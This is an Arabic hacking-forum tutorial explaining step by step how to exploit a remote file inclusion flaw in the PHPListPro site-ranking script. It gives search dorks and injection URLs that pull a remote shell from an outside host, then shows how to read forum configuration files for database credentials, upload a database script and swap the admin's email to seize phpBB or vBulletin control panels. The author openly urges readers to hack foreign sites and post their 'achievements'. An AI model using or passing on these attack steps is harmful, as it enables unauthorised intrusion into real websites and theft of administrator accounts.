اليوم راح نشرح ثغرة في سكربت PHPListPro سكربت سباق المواقع مواقع كثير جدا مصابة بها وقليل منها بالمواقع العربية والحمدلله حذرت الكثير من المواقع العربية بهذة الثغرة وراح نشرح الثغرة خطوة بخطوة حتي نخترق الموقع وندخل لوحة تحكم المنتدي نفسة لنبدأ علي بركة الله نبذة عن الثغرة المصدر http://securityreason.com/exploit*****/581 الثغرة نازلة من مدة وهناك اكثر من استثمار ولاكن اهمهم واكثرهم استخدام راح نطبق علية الدرس اول شئ قم بالدخول الي موقع بحث مفضل لك www.google.com www.yahoo.com او اي موقع بحث اكتب بخانة البحث الاتي
editsite.php?returnpath=http://www.kondor4.com/HY0.txt? او
كود PHP:
config.php?returnpath=http://www.kondor4.com/HY0.txt? او
كود PHP:
in.php?returnpath=http://www.kondor4.com/HY0.txt? او
كود PHP:
addsite.php?returnpath=http://www.kondor4.com/HY0.txt? راح نطبق الدرس علي الاستثمار مثلا هذا
كود PHP:
config.php?returnpath=http://www.kondor4.com/HY0.txt? الان بعد رابط الموقع ضع الاستثمار ليصبح كلتالي ببساطة راح تدخل الشل الان نلقي نظرة علي ملفات الموقع ونشوف فين ملف المنتدى نشوف هنلاقي اية ابو الشباب مزاجة رايق مركب 3 منتديات 2 منتدي من نوع vBulletin والثالث من نوع phpbb راح نطبق علي الاثنين لنبدا اولا بمنتدي phpbb ندخل مجلد المنتدي ومن ثم البحث عن ملف الكونفيج وندخل نقرأ بيانات الكونفيج انسخ البيانات اللي راح تلاقيها بملف الكونفيج لو المنتدي اللي راح تخترقة منتدي vb قم بالدخول الي المجلد المنتدي ومن ثم ادخل علي ومن ثم ابحث علي ملف الكونفيج كل المنتديات طريقتها واحدة تقريبا يعني مافي فرق طيب الان معنا بيانات الكونفيج نبدأ باستغلالها في اعلي الشل اضغط يظهر لك مثل نكتب فيها بيانات الكونفيح اللي طلعناها توضيح مثلا طيب لو تم الدخول ندخل علي جول اليوزر ونغير اميلنا باميل صاحب الموقع الطريقة محفوظة بي هذة الطريقة تتوقف علي حسب صلاحياتك علي السيرفر الافضل نرفع سكربت يتصل بقواعد البيانات هذة الطريقة افضل في هذة الحالة سكربت الاتصال بقواعد البيانات موجود بالمرفقات حملة وتابع معي الشرح طيب الان عايزين نرفع ملف السكربت لازم نشوف مجلد علية تصريح 777 حتي نتمكن من رفع السكربت فية نرجع الي الشل ونشوف اي مجلد علية تصريح عندنا مجلدين عليهم التصريح طيب ندخل اي مجلد علية تصريح ونزل الي اسفل حتي نري ارفع السكربت ثم طيب الان رفعنا السكربت بمجلد banners والسكربت اسمة sql.php يعني الامتداد كدة banners/sql.php يعني يكون الرابط كالتالي www.xxxx.com/banners/sql.php نجد السكربت شغال نكتب بيانات اللي معنا من ملف الكونفيج فية توضيح الان بعد الدخول نلاقي كل قواعد البيانات ظاهرة امامنا نبحث ونختار منها قاعدة بيانات المنتدي اللي طلعناها من ملف الكونفيج ونضغط علي القاعدة نشوف امامنا الجداول لو المنتدي phpbb يهمنا الجدول ولو منتدي vb يهمنا جدول اضغط علي الجدول الان نشوف بياناتة امامنا الان تابع الشرح
اضغط edit ثم نغير بريد الادمن الي بريدك وبالنهاية انزل اسفل واضغط الان اذهب الي المنتدي وقم بطلب كلمة المرور (نموذج استعادة كلمة المرور) انتظر حتي تصلك علي البريد كلمة المرور الجديدة ثم ادخل بيها المنتدي وتقدر تدخل الان لوحة تحكم المنتدي مبروك علية تم الاختراق افعل ما شئت بالمنتدي طبعا بالنهاية تم تبليغ صاحب الموقع بالثغرة والله علي ما اقول شهيد ابعدوا عن المواقع العربية ياشباب تري وربي المواقع الاجنبية مصابة بكثرة بالنهاية اتمني يكون الشرح واضح وسهل وضحت فية علي قدر المستطاع وعايزين نشوف قسم الانجازات ممتلئ من الاختراقات والابطردكم من المنتدي كلة تحياتي الي الجميع الكوندور المصري